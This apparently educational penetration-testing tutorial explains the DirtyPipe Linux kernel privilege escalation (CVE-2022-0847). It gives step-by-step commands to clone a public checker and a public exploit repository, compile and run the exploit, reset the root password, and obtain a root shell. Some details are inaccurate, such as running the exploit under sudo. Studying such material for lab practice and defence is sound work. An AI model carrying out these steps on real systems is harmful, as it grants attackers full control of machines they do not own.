Welcome back, my aspiring cyberwarriors!
Often, after successfully compromising a system, we are limited to the privilege’s of the compromised user. Regular users on systems usually have very limited privileges and can not access many of the resources or make changes to their systems and resources (databases, etc.). This is one of the many ways that good system administrators secure their networks.
Kernel Exploits
SUID/SGID misconfigurations
sudo
commands with escape characters
Service Exploits
Weak File Permissions
Environment Variables
Abusing Intended Functionality
In this tutorial, we will examine a kernel exploit privilege escalation exploit named DirtyPipe. It was found by Max Kellerman and assigned CVE-2022-0847.
DirtyPipe is a local privilege escalation vulnerability in the Linux kernel that allows a local attacker to bypass ANY file permissions, and write arbitrary data to any file under certain conditions. This means that files such as /etc/shadow, where password hashes are stored on the system can be overwritten with a new password.
Let’s test this potential local Privilege Escalation exploit on Kali 2021.
Step #1: Testing for the Vulnerability
The first step is determine whether your Linux kernel is vulnerable to Dirty Pipe. In this case, I’m using Kali 2021.
We know that the Linux kernel after 5.8 is vulnerable and that this vulnerability was patched in 5.16. We can identify the Linux kernel version by using the uname command in Linux.
kali > uname -a
kali > sudo git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
kali> cd CVE-2022-0847-dirty-pipe-checker
Now, execute the dpipe.sh script
kali > sudo dpipe.sh
As you can see above, this vulnerability checker confirmed that this Linux kernel is vulnerable to the Dirty Pipe privilege escalation exploit!
Step #2: Download the Exploit
Now that we know that this Linux version is vulnerable, let’s attempt to exploit it to get root privileges.
First, download the exploit;
kali > sudo git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
Next, navigate to the new directory.
Now that we are in that directory, let’s look inside.
kali > ls -l
kali > sudo ./compile.sh
Let’s run exploit-1 first.
kali> sudo ./exploit-1
It appears to have worked and changed the root password to “piped”!
Step #3: Login as Root
Let’s now test to see whether we can login as root.
kali> su root
Next, enter the new password “piped”
After doing so, enter the Linux command whoami;
root
uid=0(root) groups=0(root), ……..
Success! Now you have root privileges on the system and can do whatever you want!
Summary
Escalating privileges is one of the key skills of a penetration tester/hacker. In many cases, we exploit an ordinary user without the privileges we need to take control of the system/network. The DirtyPipe kernel exploit is an excellent tool to escalate privileges of Linux systems released in approximately 2021-2022.